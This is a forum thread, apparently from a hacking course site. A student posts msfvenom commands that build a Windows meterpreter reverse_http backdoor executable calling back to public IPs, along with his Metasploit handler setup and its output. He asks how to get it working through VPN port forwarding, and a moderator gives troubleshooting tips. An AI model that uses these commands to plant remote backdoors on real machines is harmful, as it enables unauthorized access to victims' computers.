Viewing 3 posts - 1 through 3 (of 3 total)
  • Author
    Posts
  • #60595
    Sylvester Peter
    Participant

    GREETINGS SIR, I’M VERY HAPPY TO BE ONE OF YOUR STUDENT AND I LOVE ALL THE COURSES AND I HAVE COMPELTED ONE. BUT SIR I’M STILL HAVING PROBLEMS IN THE PORT FORWARDING,
    I PURCHASED Private Internet Access VPN and it has Port Forwarding enable but I’m still unable to use it please I really need your urgent assistance and I will really appreciate it if you can do a Video for PIA [www.privateinternetaccess.com] Port forwarding that’s what’s holding me for completing the Second Course and I want to register for more Course after the Completion of the Second Course.

    #60602
    Sylvester Peter
    Participant

    SIR THIS IS HOW I RUN THE METASPLOIT BELOW BUT IT DID NOT WORK AND ALSO THE RESULT IN SCREENSHOT IF THERE’S ANY MISTAKE PLEASE CORRECT ME THANKS.

    msfvenom -p windows/meterpreter/reverse_http LHOST=143.244.38.61 LPORT=443 -f exe -o /var/www/html/ACCESS.exe

    msfvenom -p windows/meterpreter/reverse_http LHOST=143.244.36.79 LPORT=42338 -f exe -o /var/www/html/ACCESS.exe

    msfvenom -p windows/meterpreter/reverse_http LHOST=47.31.201.92 LPORT=42338 -f exe -o /var/www/html/ACCESS.exe

    ………………………………………………………………………………………………..

    msfconsole

    use exploit/multi/handler
    set PAYLOAD windows/meterpreter/reverse_http
    set LHOST 143.244.38.61
    set LPORT 443 and also I tried set LPORT 80

    Result Below…..

    msf6 > use exploit/multi/handler
    [*] Using configured payload generic/shell_reverse_tcp
    msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_http
    PAYLOAD => windows/meterpreter/reverse_http
    msf6 exploit(multi/handler) > set LHOST 143.244.38.61
    LHOST => 143.244.38.61
    msf6 exploit(multi/handler) > set LPORT 443
    LPORT => 443
    msf6 exploit(multi/handler) > exploit

    [-] Handler failed to bind to 143.244.38.61:443
    [*] Started HTTP reverse handler on http://0.0.0.0:443

    Attachments:
    You must be logged in to view attached files.
    #60617
    Diego PérezDiego Pérez
    Moderator

    Hi!
    Where did you get that ip for LHOST from? Because it doesn’t seem like a kali’s interface, so the listener won’t be able to bind to it.

    Also it could be very likely that the VPN provider doesn’t allow port forwarding, I’ll suggest to ask them about the issue, they are the ones who can provide an accurate about it.
    Here’s a video that will help you to use a backdoor outside the network:

    Greetings!
    Diego

Viewing 3 posts - 1 through 3 (of 3 total)
  • You must be logged in to reply to this topic.